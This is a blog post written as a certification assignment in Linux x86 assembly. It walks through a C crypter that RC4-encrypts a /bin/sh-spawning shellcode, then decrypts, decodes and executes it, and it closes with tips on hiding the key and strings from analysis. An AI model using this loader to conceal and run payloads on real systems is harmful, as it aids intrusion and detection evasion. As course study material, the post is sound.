Amonsec

It's all about digital security.

A simple blog where you can find different things about digital security.

Encrypt / Decrypt Intel x86 shellcode with RC4 algorithm

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-975
Assignment number: #7
Github repositoryhttps://github.com/amonsec/SLAE/tree/master/assignment-7

This post is part of my SLAE series.

You can find the previous post at this address: https://amonsec.net/training/linux-assembly-x86/2018/polymorphism-examples-with-linux-intel-x86-shellcodes

 

Introduction

Disclaimer

  • I’m not a cryptanalyst;
  • My math knowledge is not awesome and
  • I’m not the creator of the RC4 algorithm.

In this last SLAE assignment blog post we will discuss about crypter and how we can create a C wrapper that encrypt and decrypt our shellcode.

Requirements:

  • Linux distribution, in my case Ubuntu 10.04 LTS (x86);
  • A mouse (not the animal) and
  • A java (not the programming language).
 

About RC4 / ARCFOUR

The RC4 algorithm is pretty interesting and easy to understand for people who never deal with cryptography, like me. First of all, RC4 was designed by Ron Rivest of RSA Security in 1987 but leaked in 1994. Second, RC4 is a stream cipher that means the RC4 algorithm is based on a symmetrical key where plaintext digits, in our case our shellcode, is combined with a pseudorandom cipher digits. RC4 was highly used this last years ago in Wifi equipment due to the fact the Wired Equivalent Privacy (WEP) is based on the RC4 algorithm and that’s also the reason why WEP is so weak.

RC4 have four different stage:

  • First, initialise an array of 256 bytes;
  • Second, key scheduling algorithm;
  • Third, the pseudo random key algorithm and
  • Fourth, the XOR operation between plaintext digits and the generated pseudo random key.

Advantages:

  • Easy to implement/use;
  • Based on a XOR operation, we will use the same code to encrypt and decrypt our shellcode and
  • Does not require huge calculation.

Disadvantages

  • Based on a single XOR operation, so will not bypass modern AV or IDS and
  • RC4 is old and weak.

 

For more information about RC4 you can read the Wikipedia page: https://en.wikipedia.org/wiki/RC4

 

Building time!

I obviously have not created the following algorithm. I only translate in C the pseudo-code that you can find here:
https://en.wikipedia.org/wiki/RC4#Description

As previously written, the first thing we need to create is the initialization phase where we will populate an array with 256 digits.

#define BYTE_ARRAY 256

int initialize(void) {
    int x;

    for (x = 0; x < BYTE_ARRAY; x++) {
        s[x] = x;
    }

    i = j = 0;
    return 1;
}

Then, we need to create a method that will permute all the digits in our array in order to have a completely mixed array:

void swap(unsigned char *one, unsigned char *two) {
    char tmp = *one;

    *one = *two;
    *two = tmp;
}

int key_sheduling(unsigned char *key, int lenKey) {
    for (i = 0; i < BYTE_ARRAY; i++) {
        j = (j + s[i] + key[i % lenKey]) % BYTE_ARRAY;
        swap(&s[i], &s[j]);
    }

    i = j = 0;
}

Now, we need to create the method that will generate pseudo randomly a key:

char pseudo_random(void) {
    i = (i + 1) % BYTE_ARRAY;
    j = (j + s[i]) % BYTE_ARRAY;
    swap(&s[i], &s[j]);

    return s[(s[i] + s[j]) % BYTE_ARRAY];
}

Finally we can use a XOR operation between our plaintext and the pseudo randomly generated key:

for (count = 0; count < shellcodeLenght; count++) {

        pseudoRandomByte = pseudo_random();
        encryptedByte = shellcode[count] ^ pseudoRandomByte;
        shellcode[count] = encryptedByte;
}

If we assemble all pieces we will have something like that:

#include <stdio.h>
#include <string.h>

#define BYTE_ARRAY 256
unsigned char s[BYTE_ARRAY];
int i;
int j;

unsigned char shellcode[] = \
"our shellcode";

void swap(unsigned char *one, unsigned char *two) {
    char tmp = *one;

    *one = *two;
    *two = tmp;
}

int initialize(void) {
    int x;

    for (x = 0; x < BYTE_ARRAY; x++) {
        s[x] = x;
    }

    i = j = 0;
    return 1;
}

int key_sheduling(unsigned char *key, int lenKey) {
    for (i = 0; i < BYTE_ARRAY; i++) {
        j = (j + s[i] + key[i % lenKey]) % BYTE_ARRAY;
        swap(&s[i], &s[j]);
    }

    i = j = 0;
}

char pseudo_random(void) {
    i = (i + 1) % BYTE_ARRAY;
    j = (j + s[i]) % BYTE_ARRAY;
    swap(&s[i], &s[j]);

    return s[(s[i] + s[j]) % BYTE_ARRAY];
}

void main(int argc, char **argv){

    unsigned char key[] = "ch3rn0bylMysl4V3slUT";
    unsigned char pseudoRandomByte;
    unsigned char encryptedByte;
    int shellcodeLenght = strlen(shellcode);
    int lenKey = strlen(key);
    int count;

    initialize();
    key_sheduling(key, lenKey);

    for (count = 0; count < shellcodeLenght; count++) {

        pseudoRandomByte = pseudo_random();
        encryptedByte = shellcode[count] ^ pseudoRandomByte;
        shellcode[count] = encryptedByte;
    }
}
 

Encrypt / Decrypt

We have created the skeleton of our next two C program, the program that will encrypt our shellcode and the program that will decrypt our shellcode and then execute our shellcode.

For this example I chose a basic shellcode that will spawn a shell:

unsigned char shellcode[] = \
"\x31\xc0\x50\x89\xe2\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\xb0\x0b\xcd\x80";

With few modifications from the previous main function, we can create the C program who will encrypt our shellcode

#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

#define BYTE_ARRAY 256
unsigned char s[BYTE_ARRAY];
int i;
int j;

unsigned char shellcode[] = \
"\x31\xc0\x50\x89\xe2\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\xb0\x0b\xcd\x80";

void swap(unsigned char *one, unsigned char *two) {
    char tmp = *one;

    *one = *two;
    *two = tmp;
}

int initialize(void) {
    int x;

    for (x = 0; x &lt; BYTE_ARRAY; x++) {
        s[x] = x;
    }

    i = j = 0;
    return 1;
}

int key_sheduling(unsigned char *key, int lenKey) {
    for (i = 0; i &lt; BYTE_ARRAY; i++) {
        j = (j + s[i] + key[i % lenKey]) % BYTE_ARRAY;
        swap(&amp;s[i], &amp;s[j]);
    }

    i = j = 0;
}

char pseudo_random(void) {
    i = (i + 1) % BYTE_ARRAY;
    j = (j + s[i]) % BYTE_ARRAY;
    swap(&amp;s[i], &amp;s[j]);

    return s[(s[i] + s[j]) % BYTE_ARRAY];
}

void main(int argc, char **argv){

    unsigned char key[] = "ch3rn0bylMysl4V3slUT";
    unsigned char pseudoRandomByte;
    unsigned char encryptedByte;
    int shellcodeLenght = strlen(shellcode);
    int lenKey = strlen(key);
    int count;

    initialize();
    key_sheduling(key, lenKey);

    printf("[*] Bytes parsing\n");
    for (count = 0; count &lt; shellcodeLenght; count++) {

        pseudoRandomByte = pseudo_random();
        encryptedByte = shellcode[count] ^ pseudoRandomByte;
        shellcode[count] = encryptedByte;
        printf("\\x%.2x", encryptedByte);

    }
}

amonsec@ubuntu:/opt/slae/assignment-7$ !gcc
gcc encoder.c -o encoder -fno-stack-protector -z execstack
amonsec@ubuntu:/opt/slae/assignment-7$ ./encoder
\xbd\xbc\x17\x30\x53\x61\x2e\xdf\x49\x5b\x0a\x76\x98\x39\xd0\x5f\x0f\x5b\xb2\x97\xb8\xa3
amonsec@ubuntu:/opt/slae/assignment-7$

Nice, now, we can write the same piece of code with the encrypted shellcode, then compile the C wrapper and execute it:

#include <stdio.h>
#include <string.h>

#define BYTE_ARRAY 256
unsigned char s[BYTE_ARRAY];
int i;
int j;

unsigned char shellcode[] = \
"\xbd\xbc\x17\x30\x53\x61\x2e\xdf\x49\x5b\x0a\x76\x98\x39\xd0\x5f\x0f\x5b\xb2\x97\xb8\xa3";

void swap(unsigned char *one, unsigned char *two) {
    char tmp = *one;

    *one = *two;
    *two = tmp;
}

int initialize(void) {
    int x;

    for (x = 0; x < BYTE_ARRAY; x++) {
        s[x] = x;
    }

    i = j = 0;
    return 1;
}

int key_sheduling(unsigned char *key, int lenKey) {
    for (i = 0; i < BYTE_ARRAY; i++) {
        j = (j + s[i] + key[i % lenKey]) % BYTE_ARRAY;
        swap(&s[i], &s[j]);
    }

    i = j = 0;
}

char pseudo_random(void) {
    i = (i + 1) % BYTE_ARRAY;
    j = (j + s[i]) % BYTE_ARRAY;
    swap(&s[i], &s[j]);

    return s[(s[i] + s[j]) % BYTE_ARRAY];
}

void main(int argc, char **argv){

    unsigned char key[] = "ch3rn0bylMysl4V3slUT";
    unsigned char pseudoRandomByte;
    unsigned char encryptedByte;
    int shellcodeLenght = strlen(shellcode);
    int lenKey = strlen(key);
    int count;

    initialize();
    key_sheduling(key, lenKey);

    for (count = 0; count < shellcodeLenght; count++) {

        pseudoRandomByte = pseudo_random();
        encryptedByte = shellcode[count] ^ pseudoRandomByte;
        shellcode[count] = encryptedByte;
    }

    __asm__(
        "xor %eax, %eax\n\t"
        "xor %ebx, %ebx\n\t"
        "xor %ecx, %ecx\n\t"
        "xor %edx, %edx\n\t"

        "call shellcode"
    );
}
encrypt_decrypt_intel_ x86_shellcode_with_rc4_algorithm_crypt_exploit.png

As expected, our shellcode is successfully decrypted with the same algorithm that we used to encrypt our shellcode and finally executed. Note, the key here is a bit funny and it’s a wink to Ch3rn0byl, a good guy who made me fall in the awesome world of assembly and exploit dev.

So, I highly recommend you to read awesome exploit dev articles from his website: http://ch3rn0byl.com/

 

Bonus 

As a bonus, because it’s my last post for this series, I dug a bit deeper with my basic crypter in order to add other things that I created in previous SLAE blog posts. So, the final code will be composed by the ROT-n XOR encoded shellcode created in the assignment four and the ADD 10 encoder seen in the assignment six where we talked about polymorphism.

Final C wrapper:

#include <stdio.h>
#include <string.h>

#define BYTE_ARRAY 256
unsigned char s[BYTE_ARRAY];
int i;
int j;

unsigned char shellcode[] = \
"\x79\x5a\x2f\x82\x7b\x32\xe4\xcb\xe9"
"\x88\x42\xe3\x8a\xed\x8a\x42\xcc\x31"
"\xd8\x0e\x65\x11\x9f\xb0\x96\x84\xf5"
"\x1e\x4b\xb4\x64\x01\x1c\x6a\x4e\x47"
"\x25\x9b\xef\xc6\xcd\x1e\xd5\x15\x2a"
"\x64\x26\x9a\x5e\x19\x1c\xab\xc7\x5a"
"\x6f\x65\xff";

void swap(unsigned char *one, unsigned char *two) {
    char tmp = *one;

    *one = *two;
    *two = tmp;
}

int initialize(void) {
    int x;

    for (x = 0; x < BYTE_ARRAY; x++) {
        s[x] = x;
    }

    i = j = 0;
    return 1;
}

int key_sheduling(unsigned char *key, int lenKey) {
    for (i = 0; i < BYTE_ARRAY; i++) {
        j = (j + s[i] + key[i % lenKey]) % BYTE_ARRAY;
        swap(&s[i], &s[j]);
    }

    i = j = 0;
}

char pseudo_random(void) {
    i = (i + 1) % BYTE_ARRAY;
    j = (j + s[i]) % BYTE_ARRAY;
    swap(&s[i], &s[j]);

    return s[(s[i] + s[j]) % BYTE_ARRAY];
}

void decoder(int shellcodeLenght) {
    int x;

    for(x = 0; x < shellcodeLenght; x++) {
        shellcode[x] = shellcode[x] - 10;
    }
}

void main(int argc, char **argv){

    unsigned char key[] = "ch3rn0bylMysl4V3slUT";
    unsigned char pseudoRandomByte;
    unsigned char encryptedByte;
    int shellcodeLenght = strlen(shellcode);
    int lenKey = strlen(key);
    int count;

    printf("[*] Start decrypting shellcode..\n");
    printf("[*] Initializing bytearray\n");
    initialize();

    printf("[*] Starting key scheduling algorithm\n");
    key_sheduling(key, lenKey);

    printf("[*] Bytes parsing\n");
    for (count = 0; count < shellcodeLenght; count++) {

        pseudoRandomByte = pseudo_random();
        encryptedByte = shellcode[count] ^ pseudoRandomByte;
        shellcode[count] = encryptedByte;
    }
    printf("[+] Shellcode decrypted!\n");


    printf("[*] Decoding shellcode..\n");
    decoder(shellcodeLenght);
    printf("[+] Shellcode decoded!\n");

    printf("[+] Braaaaaaah I'm a shell!\n");

    __asm__(
        "xor %eax, %eax\n\t"
        "xor %ebx, %ebx\n\t"
        "xor %ecx, %ecx\n\t"
        "xor %edx, %edx\n\t"

        "call shellcode"
    );
}

Note, the encoder can be found in my GitHub repository.

Final compilation and execution:

encrypt_decrypt_intel_ x86_shellcode_with_rc4_algorithm_full_crypter_exploit.png

In our case, for an ultime protection, we can remove all printed message and instead of storing the key in a variable we can use it as reference of an argument passed with the execution of the program, because after the compilation we can find all strings in plaintext and especially the key:

amonsec@ubuntu:/opt/slae/assignment-7$ strings exploit
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
_IO_stdin_used
puts
__libc_start_main
GLIBC_2.0
PTRh
D$-ch3r
D$1n0by
D$5lMys
D$9l4V3
D$=slUT
2D$C
D$L;D$H|
UWVS
[^_]
[*] Start decrypting shellcode..
[*] Initializing bytearray
[*] Starting key scheduling algorithm
[*] Bytes parsing
[+] Shellcode decrypted!
[*] Decoding shellcode..
[+] Shellcode decoded!
[+] Braaaaaaah I'm a shell!
;*2$"
jNG%
amonsec@ubuntu:/opt/slae/assignment-7$
 

Story end

This is the last post about this series, so it was really fun and I learned a lot of interesting things in this assembly journey. I want to say thanks to Vivek Ramachandran for this awesome course and to always have a big smile in the videos.

For people who don’t know him and his work, you can visit this two websites where you can learn a huge amount of things for a good price:

 
 

break